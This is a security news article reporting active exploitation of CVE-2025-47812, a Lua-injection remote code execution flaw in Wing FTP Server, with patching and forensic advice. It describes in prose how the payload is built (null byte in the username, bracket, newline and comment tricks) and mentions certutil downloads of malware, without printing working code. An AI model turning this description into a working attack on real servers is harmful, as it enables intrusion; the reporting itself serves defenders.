Wing FTP Server RCE Vulnerability Under Active Exploitation

Security researchers at Huntress have confirmed active exploitation of a critical remote code execution vulnerability in Wing FTP Server, designated CVE-2025-47812, with the first observed attack occurring just one day after the vulnerability’s public disclosure.

The flaw affects versions before 7.4.4 and can lead to root or SYSTEM-level remote code execution, prompting urgent calls for organizations to update their installations immediately.

Critical Vulnerability Details

CVE-2025-47812 represents a significant security threat stemming from improper handling of null bytes in the username parameter, specifically related to the loginok.html file that manages authentication processes.

The vulnerability enables remote attackers to perform Lua injection attacks by exploiting null byte handling weaknesses, potentially compromising entire systems.

The vulnerability was first publicly disclosed on June 30, 2025, by security researcher Julien Ahrens, affecting Wing FTP Server’s file transfer protocol software across Windows, Linux, and macOS platforms.

Within 24 hours of disclosure, Huntress security researchers documented the first exploitation attempt against a customer environment on July 1, 2025, with attack activity escalating around 16:15 UTC.

Attack Chain and Technical Analysis

The exploitation process follows a sophisticated multi-step attack chain. Attackers initiate login attempts against the loginok.html endpoint via POST requests, using either known credentials or anonymous accounts when available.

The malicious payload includes a %00 null-byte appended to the username field, disrupting normal string processing and enabling injection of malicious Lua code.

The injected code includes specific syntax elements: two closing square brackets to maintain session object file integrity, newlines for code injection, and comment symbols to neutralize original code remnants.

The malicious Lua code executes when the application deserializes session data during subsequent page requests.

Huntress researchers observed attackers conducting extensive reconnaissance activities, including system enumeration commands, user creation for persistence, and attempted payload delivery through various methods including ScreenConnect remote access tools and malicious executables.

The vulnerability leaves substantial forensic artifacts across multiple locations within Wing FTP Server installations.

 Log files located in C:Program Files (x86)Wing FTP ServerLog contain truncated entries indicating exploitation attempts, while session object files in the session directory reveal injected Lua code with significantly increased file sizes.

Analysis of session files revealed attackers attempting to execute commands through hex-encoded payloads, including attempts to download and execute malicious binaries using Windows’ certutil utility.

Microsoft Defender successfully intercepted several attack attempts, identifying threats as Trojan:Win32/Ceprolad.A.

Organizations running Wing FTP Server should immediately update to version 7.4.4 to mitigate this actively exploited vulnerability.

Security teams should monitor log files for truncated username entries and examine session object files for anomalous sizes or content.

Given the rapid exploitation timeline following disclosure, this vulnerability represents a critical security risk requiring immediate attention.

Stay Updated on Daily Cybersecurity News . Follow us on Google News, LinkedIn, and X.